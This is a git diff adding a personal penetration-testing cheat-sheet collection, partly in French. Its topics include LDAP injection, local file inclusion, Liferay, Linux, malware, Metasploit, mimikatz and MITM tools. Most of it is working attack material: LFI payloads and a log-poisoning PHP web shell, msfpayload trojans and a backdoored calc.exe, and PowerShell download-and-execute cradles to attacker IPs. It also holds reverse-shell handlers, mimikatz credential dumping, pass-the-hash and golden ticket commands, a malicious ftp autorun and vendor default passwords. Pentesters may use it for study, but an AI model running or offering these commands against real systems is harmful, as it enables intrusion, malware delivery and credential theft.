+# ldap injection
+vuln=*)(sn=
+vuln=*)!(sn=*
diff --git a/Cheat Sheet/lfi b/Cheat Sheet/lfi
new file mode 100644
index 0000000..df3fa81
--- /dev/null
+++ b/Cheat Sheet/lfi	
@@ -0,0 +1,67 @@
+# lfi
+
+# http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/
+/../../etc/passwd%00
+/../../var/log/httpd/access_log
+/proc/self/environ + User-Agent (no need to url-encode)
+
+# use filter to read a .php file (prevent it to be interpreted)
+index.php?page=php://filter/convert.base64-encode/resource=/path/to/config.php
+
+tester avec data://
+view-source:data://text/plain;base64,Ym9uam91cgo=
+
+# use compression
+php://filter/zlib.deflate/convert.base64-encode/resource=bigfile.txt
+
+# use iconv to convert a file to a php image
+php://filter/convert.iconv.IBM1154%2fUTF-32BE/resource=/flag http://gynvael.coldwind.pl/?lang=en&id=671
+
+# does a folder exist
+index.php?page=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
+
+# PHP 5.3.4 
+NULL byte in paths fixed
+
+# windows
+* use Alternate Data Streams (https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/)
+../../test.txt:data.aspx
+echo secret > test.txt:data.aspx
+more < test.txt:data.aspx 
+type test.txt:data.aspx will print the "The filename, ... syntax is incorrect" error
+
+::$DATA to access the content of the file (and not an ADS)
+show source code bypass: http://www.alternate-data-streams.com/default.asp::$DATA
+
+* use multibyte encodings
+null byte: %c0%80
+fwd slash: ../%c0%af (because %80 + %2f == %af)
+old school 2000: http ://www.myserver.com/scripts/..%c0%af../winnt/system32/cmd.exe?c+dir+c:\
+many other ways to encode the forward-slash and backslah in unicode:
+%c0%af %c1%9c %c1%pc %c0%qf %c1%8s %c1%1c %c1%af %e0%80%af
+source: http://www.sans.org/reading-room/whitepapers/threats/unicode-vulnerability-why-458
+
+# logs
+/proc/self/fd/10
+access_log
+or other logs e.g. via ssh client banner:
+echo '<? system($_GET["cmd"]);exit; ?>' | nc 10.0.0.1 22
+then curl 10.0.0.1/test.php?page=/var/log/auth.log&cmd=id
+
+# if you can upload files or images
+insert php code in file
+https://github.com/m101/lfipwn
+if you can use the zip:// handler, upload a png with a zip in the palette (polyglot) see plaid-ctf-2016 pixelshop
+
+# appsec usa 2013 schemes by platform
+* libxml2
+file, http, ftp
+* PHP
+file, http, ftp, php, compress.zlib, compress.bzip2, data, glob, phar
+* Java
+http, https, ftp, file, jar, netdoc, mailto, gopher (removed circa Sept 2012)
+file://proc/self//cwd/../config (evite de trouver le installdir de l'app)
+* .NET
+file, http, https, ftp
+
+also see ./ssrf
diff --git a/Cheat Sheet/lftp b/Cheat Sheet/lftp
new file mode 100644
index 0000000..d03b367
--- /dev/null
+++ b/Cheat Sheet/lftp	
@@ -0,0 +1,12 @@
+# lftp
+
+# no SSL cert verification and setting the port range for active mode if passive mode does work then lftp falls back to active mode
+$ lftp -d 200.10.10.10
+lftp 200.10.10.10:~> user foo
+Password: 
+lftp foo@200.10.10.10:~> set ftp:port-range 60000:61000
+lftp foo@200.10.10.10:~> set ssl:verify-certificate no
+lftp foo@200.10.10.10:~> ls
+
+# active mode
+lftp -e 'set ftp:passive-mode off; set ftp:auto-passive-mode no;'
diff --git a/Cheat Sheet/liferay b/Cheat Sheet/liferay
new file mode 100644
index 0000000..5558b2c
--- /dev/null
+++ b/Cheat Sheet/liferay	
@@ -0,0 +1,11 @@
+# liferay
+
+http://www.insinuator.net/2011/12/liferay-portlet-shell/
+
+# admin / deballer la guerre
+default account: test@liferay.com / test 
+
+# hack liferay calendar using https://issues.liferay.com/browse/LPS-28310
+payload is something like
+groupId=10138&fileName=te&serviceClassName=com.liferay.portlet.calendar.service.CalEventServiceUtil&serviceMethodName=exportGroupEvents&serviceParameters=%5B%22groupId%22%2C%22fileName%22%5D&doAsUserId=
+you need to create an event with some java code in the title and export it somewhere you can access it
diff --git a/Cheat Sheet/linux b/Cheat Sheet/linux
new file mode 100644
index 0000000..6d8a4ac
--- /dev/null
+++ b/Cheat Sheet/linux	
@@ -0,0 +1,65 @@
+# linux
+
+https://0xax.gitbooks.io/linux-insides/content/index.html
+
+# capabilities
+lsattr /bin/ping
+-------------e-- /bin/ping
+getcap /bin/ping
+/bin/ping = cap_net_admin,cap_net_raw+ep
+
+# disable ASLR
+echo 0 > /proc/sys/kernel/randomize_va_space
+
+# kaslr bypass
+kernel_text=$((0x80000000+0x`cat /proc/iomem|grep code|cut -d- -f1|tr -d ' '`))
+
+# coreutils
+rpm -ql coreutils | grep man1 | sed -e 's,^.\+/,,' -e 's,\.1\.gz$,,'
+
+# iproute2
+ip route change default via 192.168.99.113 dev eth0
+
+# monitoring / performance observability tools 
+http://www.brendangregg.com/Perf/linux_observability_tools.png
+http://xmodulo.com/useful-command-line-network-monitors-linux.html
+http://xmodulo.com/visualize-memory-usage-linux.html (smem)
+glances
+nethogs
+iptraf
+iftop
+nmon
+bmon
+pktstat
+tcptrack
+https://github.com/caesar0301/awesome-pcaptools
+
+# using the Lime LKM to dump memory
+http://blog.opensecurityresearch.com/2014/05/acquiring-linux-memory-from-server-far.html
+
+# sysctl
+recharge la conf avec sysctl -p
+
+# get rid of ipv6
+net.ipv6.conf.all.disable_ipv6 = 1
+net.ipv6.conf.default.disable_ipv6 = 1
+
+# mitm
+net.ipv4.ip_forward = 1
+net.ipv4.conf.all.send_redirects = 0
+net.ipv4.conf.default.send_redirects = 0
+net.ipv4.conf.all.accept_redirects = 0
+net.ipv4.conf.default.accept_redirects = 0
+
+# systemd
+https://n0where.net/understanding-systemd/
+
+# kernel modules
+* modinfo
+$ sudo modinfo iwl3945 | grep srcversion
+srcversion: FDE2E62843DE3ED112A50C3
+
+# rootkits
+https://github.com/mncoppola/suterusu
+http://blackhatlibrary.net/Azazel
+https://github.com/f0rb1dd3n/Reptile
diff --git a/Cheat Sheet/load_balancing b/Cheat Sheet/load_balancing
new file mode 100644
index 0000000..b1e6b5e
--- /dev/null
+++ b/Cheat Sheet/load_balancing	
@@ -0,0 +1,8 @@
+# load balancer
+
+Client-Date: pour detecter plusieurs srv derriere un Load Balancer
+
+hping -S -p 80 -c 5 80.100.101.102; hping -S -p 80 -c 5 80.70.60.50
+Si les ID se suivent, les 2 plages correspondent aux memes machines
+
+
diff --git a/Cheat Sheet/malware b/Cheat Sheet/malware
new file mode 100644
index 0000000..60385b3
--- /dev/null
+++ b/Cheat Sheet/malware	
@@ -0,0 +1,96 @@
+# malware / virus
+
+# malware techniques
+https://github.com/secrary/InjectProc # process injection
+https://securedorg.github.io/RE101/
+
+# extract macros from office documents
+http://blog.didierstevens.com/2014/12/23/oledump-extracting-embedded-exe-from-doc/
+
+# excel malicious macro
+http://carnal0wnage.attackresearch.com/2015/01/enigma0x3s-generate-macro-powershell.html
+
+# quick scan
+https://github.com/Neo23x0/Loki.git
+
+# online testing
+https://malwr.com/
+https://anubis.iseclab.org/
+https://www.metascan-online.com/
+reverse.it/hybrid-analysis.com
+www.threatexpert.com
+www.virustotal.com
+vscan.novirusthanks.org # with check box that says "Do not distribute the sample"
+wepawet.iseclab.org
+
+# dynamic analysis
+http://www.darknet.org.uk/2016/05/captipper-explore-malicious-http-traffic/ (observe HTTP traffic from pcap)
+
+# analysis
+http://haxf4rall.com/2017/07/26/flare-vm-a-fully-customizable-windows-based-security-distribution-for-malware-analysis-incident-response-penetration-testing/ # flare vm
+https://github.com/GoSecure/malboxes
+http://www.malware-analyzer.com/malware-analysis-tools/
+http://cuckoosandbox.org/
+
+# see if anyone else has seen the file
+fileadvisor.bit9.com
+
+# silly autoruns
+HKLM\software\wow6432node\microsoft\windows\currentversion\run
+blah REG_SZ c:\windows\SysWow64\cmd.exe /c net1 stop sharedaccess&echo open 6.6.6.6 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get server.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&server.exe&del ...
+
+any entry with a value that starts with c:\windows\syswow64\cmd sysinternal\autoruns will not be shown by sysinternals/autoruns
+
+# virus (history, interviews, online ezines ...)
+http://spth.virii.lu/main.htm
+
+# volatility
+http://blog.hackeracademy.com/wp-content/uploads/2012/12/THA-Deep-Dive-Analyzing-Malware-in-Memory.pdf
+
+# blaster
+Blaster/Lovsan : vers exploitant une vulnerabilité dans l'interface DCOM du système d'exploitation Windows (XP et 2000).
+16 juillet 2003: vuln découverte par le groupe polonais Last Stage of Delirium et MS publie le correctif MS03-026.
+11 aout    2003: premiere detection du vers, puis apparition des variantes B,C,...
+
+DCOM est utilisé pour la communication inter-processus, cela permet à un
+programme actif sur une machine locale d'exécuter du code sur une machine
+distante. Ce protocole est une variante du protocole RPC de l'Open Software
+Foundation (OSF) comportant des extensions Microsoft spécifiques.
+
+La faille est de type débordement de tampon, son exploitation permet, via une
+requête formatée convenablement, d'exécuter du code arbitraire sur une machine
+vulnérable.
+
+Mécanisme d'infection
+1. Generation de 20 adresses IP aléatoires qui permet une diffusion optimale
+2. connect(T:135)
+3. Pour les connexions établies, injection d'une partie du code malveillant (exploit ou charge)
+4. Comme l'adresse de retour (et donc le code de l'exploit) est different entre win2k et winXP, 1 fois sur 4, c'est la charge pour win2k qui est envoyé, sinon c'est pour winXP
+5. connect(T:4444)
+6. tftp -l <adresse IP de la machine infectante> GET msblash.exe
+7. Execution du ver pour infecter la victime (start msblast.exe)
+8. Creation du mutex "Billy" pour eviter la surinfection et d'une clef de registre pour rendre le ver persistent au reboot
+9. à partir du 16 aout, DoS windowsupdate.com : envoi d'un paquet Syn toute les 20ms avec adresse source aleatoire (spoofée)
+
+Remarques diverses
+  - Erreur du programmeur du ver: possible de faire des mises à jour windows avec d'autres URL
+windowsupdate.microsoft.com (windows update du menu démarrer)
+www.microsoft.com/isapi/redir.dll?prd=Win2000&ar=WinUpdate
+  - choix de la date préméditée (vacances (machines éteintes) puis retour de vacances (infection) et DoS (retarder maj) = augmenter impact)
+  - correctif MS03-049 mi-novembre pour une vuln dans Workstation Service (2000 et XP): perte de la confiance des utilisateurs? En tout cas, importance d'une reactivité serieuse dans l'application des correctifs pour les systèmes perclus de failles!
+
+# famous worms/viruses
+* yammer
+Js.Yamanner@m Yahoo! Mail worm. It appeared on June 11, 2006 and was the first webmail interface worm
+
+* Nduja
+Another proof-of-concept webmail worm is Nduja, a cross-domain worm for four Italian webmail services. Find more details on Rosario Valotta's paper. Both webmail worms have the goal to harvest email addresses, something a criminal hacker could make money with.
+
+* MySpace phishing 34k user/passwords
+In December 2006, 34000 actual user names and passwords were stolen in a MySpace phishing attack.
+The idea of the attack was to create a profile page named ¿login_home_index_html¿, so the URL looked very convincing.
+Specially-crafted HTML and CSS was used to hide the genuine MySpace content from the page and instead display its own login form.
+
+* MySpace Samy 
+This worm automatically sent a friend request to Samy (the attacker) simply by visiting his profile.
+Within several hours he had over 1 million friend requests, but it creates too much traffic on MySpace, so that the site goes offline.
diff --git a/Cheat Sheet/maven b/Cheat Sheet/maven
new file mode 100644
index 0000000..5019866
--- /dev/null
+++ b/Cheat Sheet/maven	
@@ -0,0 +1,4 @@
+# maven
+
+# skip unit tests
+mvn -Dmaven.test.skip=true clean install
diff --git a/Cheat Sheet/mcafee b/Cheat Sheet/mcafee
new file mode 100644
index 0000000..6236e15
--- /dev/null
+++ b/Cheat Sheet/mcafee	
@@ -0,0 +1,10 @@
+# mcafee
+
+# privesc to DA with SiteList.xml
+https://www.reddit.com/r/netsec/comments/43mni7/mcafee_privileged_sitelistxml_leads_to_active/
+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf from the reddit comments
+http://warchest.fusionx.com/mcafee-sitelist-xml-domain-credentials-disclosure/
+
+# ePO server / epolicy
+https://funoverip.net/2014/04/mcafee-epolicy-0wner-0-1-release/
diff --git a/Cheat Sheet/md5 b/Cheat Sheet/md5
new file mode 100644
index 0000000..af1d689
--- /dev/null
+++ b/Cheat Sheet/md5	
@@ -0,0 +1,24 @@
+# md5
+
+# 1 block collisions
+
+* md5
+http://marc-stevens.nl/research/md5-1block-collision/
+input1 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2'.decode('hex')
+input2 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2'.decode('hex')
+or
+input1 = '0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef'.decode('hex')
+input2 = '0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef'.decode('hex')
+
+print 'Are strings equal?',(input1 == input2)
+print 'input1 md5:',md5(input1).hexdigest()
+print 'input2 md5:',md5(input2).hexdigest()
+
+* sha1
+input1 = array('I', [0x6165300e,0x87a79a55,0xf7c60bd0,0x34febd0b,0x6503cf04,0x854f709e,0xfb0fc034,0x874c9c65,0x2f94cc40,0x15a12deb,0x5c15f4a3,0x490786bb,0x6d658673,0xa4341f7d,0x8fd75920,0xefd18d5a])
+input2 = array('I', [x^y for x,y in zip(input1,[0, 0, 0, 0, 0, 1<<10, 0, 0, 0, 0, 1<<31, 0, 0, 0, 0, 0])])
+
+print 'Are strings equal?',(input1 == input2)
+print 'input1 sha1:',sha1(input1).hexdigest()
+print 'input2 sha1:',sha1(input2).hexdigest()
+
diff --git a/Cheat Sheet/medusa b/Cheat Sheet/medusa
new file mode 100644
index 0000000..f7b24ba
--- /dev/null
+++ b/Cheat Sheet/medusa	
@@ -0,0 +1,6 @@
+# medusa
+
+# bug auth basic tomcat manager
+./medusa -v 4 -M http -U ~/logins.wl -P ~/passwords.wl -m DIR:/manager/html -h 127.0.0.1 -n 8080
+
+medusa marche pas quand la reponse 401 est fragmentée en 2 paquets TCP. Faut augmenter le delay2 mais du coup on lit toute la reponse et on perd en perf.
diff --git a/Cheat Sheet/metasploit b/Cheat Sheet/metasploit
new file mode 100644
index 0000000..30bf2c8
--- /dev/null
+++ b/Cheat Sheet/metasploit	
@@ -0,0 +1,208 @@
+# metasploit
+
+https://metasploit.github.io/
+
+# basic trojan
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 X > meter.exe
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 R | ./msfencode -b '' -t exe -o meterpreter.exe
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5 // x86 only?
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 R | python ~/tools/exploit/pwntools/scramble/scramble - | ./msfencode -t exe -e generic/none -o blah.exe // to try
+http://carnal0wnage.attackresearch.com/node/409
+
+# quick wins
+./msfconsole -x 'use multi/handler; set payload cmd/unix/reverse_bash; set lport 1234; set lhost 127.0.0.1; set ExitOnSession false; exploit -j -z' # handle multiple reverse shells
+./msfconsole -x 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lport 1234; set lhost 192.168.122.1; exploit -j -z'
+./msfvenom -e x86/alpha_mixed -f raw -p windows/meterpreter/reverse_tcp BufferRegister=EAX LPORT=1234 LHOST=
+
+./msfconsole -x 'use exploit/multi/script/web_delivery; set URIPATH /foo; set lport 1234; set lhost 192.168.122.1; set target 2; exploit -j -z'
+c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe #if c:\windows\system32\powershell.exe doesnt exist
+powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring('http://192.168.122.1:8080/foo')) #simple
+powershell.exe -nop -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX ((new-object net.webclient).downloadstring('https://192.168.122.1:8080/foo')) # simple w/ ssl to avoid detection
+
+powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring('http://192.168.122.1:8080/foo'); #msf
+powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('https://192.168.122.1:8080/foo'); # msf w/ ssl
+
+msfcli exploit/windows/smb/psexec RHOST= SMBUser= SMBPass= SMBDomain= PAYLOAD=windows/meterpreter/bind_tcp E
+msfcli exploit/windows/smb/ms08_067_netapi RHOST= PAYLOAD=windows/meterpreter/bind_tcp E
+msfcli exploit/windows/antivirus/ams_hndlrsvc RHOST= CMD='telnet x.x.x.x 445' E
+msfcli auxiliary/scanner/smb/smb_lookupsid RHOSTS=file:dcs.txt E
+msfcli modules/auxiliary/scanner/snmp/snmp_login RHOST=x.x.x.x E
+msfcli auxiliary/server/capture/smb JOHNPWFILE=/tmp/capture-smb.pw VERBOSE=true SRVHOST=127.0.0.1 SRVPORT=4445 E (and as root: socat tcp-l:445,fork,reuseaddr tcp:127.0.0.1:4445)
+
+auxiliary/scanner/misc/java_rmi_server
+auxiliary/scanner/lotus/lotus_domino_hashes
+auxiliary/scanner/smb/smb_enumusers
+auxiliary/scanner/smb/smb_lookupsid
+auxiliary/scanner/oracle/sid_enum
+
+# client side
+Office OLE multiple DLL https://vimeo.com/138840584
+
+# main commands
+show options
+show advanced
+set (includes setg output)
+back
+set proxies http:127.0.0.1:8082 // or socks4:127.0.0.1:8082
+
+getuid
+sysinfo
+getpid
+ps
+services
+
+# dev
+rexploit # reloads module
+
+# elevation
+run post/<TAB> // to list all available
+run migrate or smart_migrate
+run vnc
+run screen_unlock
+
+keyscan_start
+keyscan_dump
+keyscan_stop
+
+use priv
+getsystem -t 1 ... http://carnal0wnage.attackresearch.com/node/404
+getuid
+rev2self // revenir sous le user precedent
+
+stal_token
+shell // uses impersonated token by default (-t option of execute)
+drop_token
+
+# recup infos
+scraper
+winenum
+wmic
+
+# enable telnet
+gettelnet -e
+
+# port scanner
+meterpreter > run autoroute -s 10.p.c.i/24
+^Z
+use auxiliary/scanner/portscan/tcp
+set THREADS 10
+set CONCURRENCY 10
+
+or try out msfmap in tools
+
+# port fwd
+portfwd add -l 1234 -p 3389 -r 10.0.0.2
+
+# post-exploit
+* msf/meterpreter
+hashdump
+use post/windows/gather/cachedump
+set SESSION 1
+run
+
+lancer les outils suivants dans un shell SYSTEM, donc soit avec:
+  - execute -m -i -f tool.exe [-a des options ...] (ressayer plusieurs fois si rien ne s'affiche)
+execute -m -i -f /home/seb/tools/exploit/wce64.exe 
+execute -m -i -f /home/seb/tools/exploit/wce64.exe -a -w
+execute -m -i -f /home/seb/tools/exploit/gsecdump.exe -a -a
+
+meterpreter > download c:\\windows\\system32\\calc.exe
+meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
+
+sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.6.6.6:8080/'))"
+
+  - sinon depuis un cmd.exe
+wce.exe
+wce.exe -w
+
+gsecdump -a
+
+mimikatz.exe
+privilege::debug
+sekurlsa::logonPasswords
+sekurlsa::ssp
+samdump::hashes
+
+# auto with rc scripts
+msf.rc:
+set ConsoleLogging true
+set LogLevel 5
+set SessionLogging true
+set TimestampOutput true
+set PROMPT %T S:%S J:%J
+use multi/handler
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST 192.168.122.1
+set LPORT 4444
+set ExitOnSession false
+set AutoRunScript multiscript -rc /path/to/meterpreter.rc # see https://github.com/rapid7/metasploit-framework/tree/master/scripts/meterpreter
+exploit -j -z
+
+meterpreter.rc:
+get_env
+multi_console_command -cl "getuid","sysinfo","webcam_snap","screenshot"
+migrate -f
+checkvm
+
+might need to migrate to proper process to get screenshot or keylock-sniff-pw etc.
+
+./msfconsole -r msf.rc
+
+shim2.exe <...>
+
+crackmapexec -d DOM -u foo -p bar --no-output -x '\\6.6.6.6\l\shim2.bat' 1.2.3.4
+
+# generate standalone exe from msfconsole
+generate -t exe -f blah.exe
+
+# kiwi
+load kiwi (load mimikatz for old version)
+
+# misc notes
+whosthere ne marche pas sur 2008
+whosthere-alt a deja marche sur 2008 et 2003 (mais produit la meme sortie que wce.exe)
+
+wce -e crash au bout d'un moment, mieux vaut utiliser wce -r 
+
+* incognito
+use incognito
+list_tokens -u
+impersonate ...
+getuid
+execute -t -i -c -H -f cmd.exe 
+whoami
+execute -t -f c:\\windows\\temp\\shim2.exe -a PYIII...
+
+* CMD
+./msfpayload java/meterpreter/bind_tcp LPORT=5556 X > lin.jar
+wget -O /tmp/lin.jar http://<server>/lin.jar
+java -jar /tmp/lin.jar
+
+# golden ticket in meterpreter
+http://blog.strategiccyber.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
+
+# ms14-068 in metasploit
+https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
+
+# phish
+* keylogger
+run post/windows/capture/keylog_recorder # capture winlogon creds
+run post/windows/capture/lockout_keylogger # fake lockscreen
+
+https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
+
+# harvesting files
+http://carnal0wnage.attackresearch.com/2015/02/my-golddigger-script.html
+
+# http ntlm auth attempt to smb relay
+use auxiliary/server/http_ntlmrelay
+
+set URIPATH /
+set SRVPORT 80
+set RHOST 10.0.0.101 // BACKUP DC
+set RPORT 445
+set RTYPE SMB_PWN
+set RURIPATH \\\\10.6.6.6\share\shim2.exe // payload hard-coded
+
+# api
+https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/
diff --git a/Cheat Sheet/methodo-webapp b/Cheat Sheet/methodo-webapp
new file mode 100644
index 0000000..669ac8e
--- /dev/null
+++ b/Cheat Sheet/methodo-webapp	
@@ -0,0 +1,42 @@
+# methodology for webapp testing
+
+# Map the Application's Content
+* Explore visible content
+browse the entire app, visit every link and URL, submit every form, proceed through all multi-step functions to completion.
+review the site map and identify any content or functionality that I have not walked through using my browser
+establish where each item was discovered (for exmample, check the Linked From details in Burp Spider)
+
+* Internet search
+archives (wayback)
+google site: and link:
+search on any names and email addresses discovered within the application's content
+perform news and groups searches regarding the target application and its supporting infrastructure
+
+* Discover hidden content
+common fil and directory names and common file extensions
+understand the nameing conventions (AddDocument.jsp and ViewDocument.jsp => EditDocument.jsp)
+review all client-side code to identify any clues about hidden server-side content (HTML comments, disabled forms ...)
+
+* Discover default content
+nikto etc.
+
+* Enumerate identified-specified functions
+/admin.jsp?action=editUser or /main.php?func=A21
+
+* Test for debug parameters
+debug,test,hide,source=true,yes,on,1
+for POST requests, supply in both query string and body
+
+# Analyze the application
+* Identify functionality
+identify the core security mechanisms employed by the application and the ways they work
+understand the key mechanisms that handle authentication, session management, access control, and the functions that support them, such as user registration and account recovery
+
+* Identify data entry points
+identify all of the different entry points that exist
+examine any customized data transmission or encoding mechanisms
+identify any out-of-band channels (eg. webmail that processes messages received via SMTP)
+
+* Identify the Technologies Used
+forms, scripts, cookies, Java applets, ActiveX controls, Flash objects
+
diff --git a/Cheat Sheet/micros b/Cheat Sheet/micros
new file mode 100644
index 0000000..8927d83
--- /dev/null
+++ b/Cheat Sheet/micros	
@@ -0,0 +1,13 @@
+# micros
+
+vendor default password is 'micros'
+
+m9700 / Micros9700
+9700Cfg / undisclosed
+csremote/EBUTO
+sa / mymicros
+administrator / micros
+
+other common logins & passwords:
+pos/pos
+pos/pos0000
diff --git a/Cheat Sheet/microsoft b/Cheat Sheet/microsoft
new file mode 100644
index 0000000..570aa30
--- /dev/null
+++ b/Cheat Sheet/microsoft	
@@ -0,0 +1,8 @@
+# microsoft
+
+# download legal iso
+http://superuser.com/questions/78761/where-can-i-download-windows-7-legally-from-microsoft
+http://forums.whirlpool.net.au/archive/1755258
+
+# office365 auth bypass
+http://www.economyofmechanism.com/office365-authbypass.html
diff --git a/Cheat Sheet/mimikatz b/Cheat Sheet/mimikatz
new file mode 100644
index 0000000..b6b2474
--- /dev/null
+++ b/Cheat Sheet/mimikatz	
@@ -0,0 +1,120 @@
+# mimikatz
+
+http://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
+http://adsecurity.org/?p=556 https://adsecurity.org/?page_id=1821
+https://github.com/gentilkiwi/mimikatz/wiki
+
+# always (to access secure lsa mem)
+privilege::debug
+
+# lulz
+coffee
+markruss
+minesweeper::infos
+
+# who am i
+system::user
+
+# minidump
+mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
+
+# list module commands
+sekurlsa::asdf
+
+# logged-on users
+sekurlsa::logonPasswords
+
+# outband SMB sessions
+sekurlsa::ssp
+
+# sam hashes
+samdump::hashes
+
+# get system
+token::elevate
+
+# lsa secrets and cached creds
+lsadump::secrets system.save security.save
+lsadump::cache system.save security.save
+
+# vault
+vault::list
+vault::cred
+
+# scheduled tasks with credz
+?
+
+# kiwissp.dll
+Security Providers
+will dump passwords in clear-text of users logging-on console or RDP
+
+# pass the ticket (aka overpass-the-hash)
+sekurlsa::pth /user:Administrator /domain:LAB.lOCAL /rc4:6194bd1a5bf3ecd542e8aac9860bddf0
+or with /aes256: instead of rc4 or etc.
+
+# pass the hash to RDP to host using restricted admin mode
+sekurlsa::pth /user: /domain:bar /ntlm:... /run:"mstsc /restrictedadmin /v:1.2.3.4"
+
+# kerberos tickets
+sekurlsa::ekeys # dump all keys in mem
+sekurlsa::tickets /export # export tickets of everyone if SYSTEM
+kerberos::klist
+kerberos::ptt blah.tgt blih.tgs # import tgt or tgs
+kerberos::ptt tickets # list
+
+# golden ticket (tgt 10years hardcoded)
+# http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
+# http://rycon.hu/papers/goldenticket.html
+- krbtgt user's NT hash (e.g. from a previous NTDS.DIT dump)
+- Domain name
+- Domain's SID (S-1-5-21-1723555596-1415287819-2705645101)
+- Username that we'd like to impersonate
+
+PsGetsid.exe CTU.DOMAIN (or with whoami)
+mimikatz.exe
+ kerberos::list
+ kerberos::purge # not 100% reliable but loggoff is
+ kerberos::golden /admin:Administrator /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi
+ kerberos::golden /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /rc4:6194bd1a5bf3ecd542e8aac9860bddf0 /user:Administrator /id:500 /groups:513,512,520,518,519 /ptt *or* /ticket:domain.local.kirbi and then kerberos:ptt domain.local.kirbi
+ kerberos::list
+ kerberos::tgt # list tgt only
+
+512: domain admins
+519: enterprise admins
+518: schema admins
+520:
+513:
+ 
+additional notes:
+- Password change on behalf of the user does not have any impact on the ticket, the access can be granted without the user's password or hash
+- Existing sessions cannot be overridden. Already attached shares have to be detached first and reattached again.
+- Cached tickets sometimes cannot be purged so the computer has to be restarted (for example if there is a group policy that attaches different shares then those shares cannot be mounted as the impersonated user)
+- Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT
+
+# silver ticket (TGS)
+https://adsecurity.org/?p=2011
+
+# mass mimikatz and null session share setup howto
+https://blog.netspi.com/auto-dumping-domain-credentials-using-spns-powershell-remoting-and-mimikatz/
+http://www.room362.com/blog/2013/10/06/dumping-a-domain-worth-of-passwords-with-mimikatz/ 
+
+# virtual machine memory (eg from a .vmem)
+http://carnal0wnage.attackresearch.com/2014/06/mimikatz-against-virtual-machine-memory.html
+
+# change user password with only the nt hash
+aoratopw.exe /user:jsmith /domain:chocolate.local /key:asjdfasdfasdf /new:Kikoolol1
+
+# beyond
+misc::addsid # sid history
+
+mimilib Password Filter
+mimilib SSP # requires reboot
+
+misc::memssp # to try out
+
+misc::skeleton
+
+# windows 8.1
+http://carnal0wnage.attackresearch.com/2015/02/msfs-mimikatz-doesnt-work-on-windows-81.html?utm_content=buffer1ac94&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer
+https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/
+http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
diff --git a/Cheat Sheet/mitm b/Cheat Sheet/mitm
new file mode 100644
index 0000000..6e4d031
--- /dev/null
+++ b/Cheat Sheet/mitm	
@@ -0,0 +1,210 @@
+# mitm
+
+# tools
+bettercap (https://github.com/evilsocket/bettercap-proxy-modules)
+pyersinia (https://github.com/nottinghamprisateam/pyersinia) based off yersinia
+mallory
+marvin (http://www.gremwell.com/marvin-mitm-tapping-dot1x-links)
+apimonitor (http://www.rohitab.com/apimonitor)
+echomirage (http://www.wildcroftsecurity.com/echo-mirage was:http://www.bindshell.net/tools/echomirage.html)
+pfi (https://github.com/s7ephen/pfi.git)
+tcpprox (https://github.com/iSECPartners/tcpprox) "TCP proxy utility written in Python"
+canape (http://www.contextis.com/research/tools/canape/) "capture and modify traffic, specifically designed for binary protocols"
+trudy https://www.praetorian.com/blog/trudy-a-dead-simple-tcp-intercepting-proxy-mitm-vm
+NetRipper (https://github.com/NytroRST/NetRipper ) "Windows API hooking"
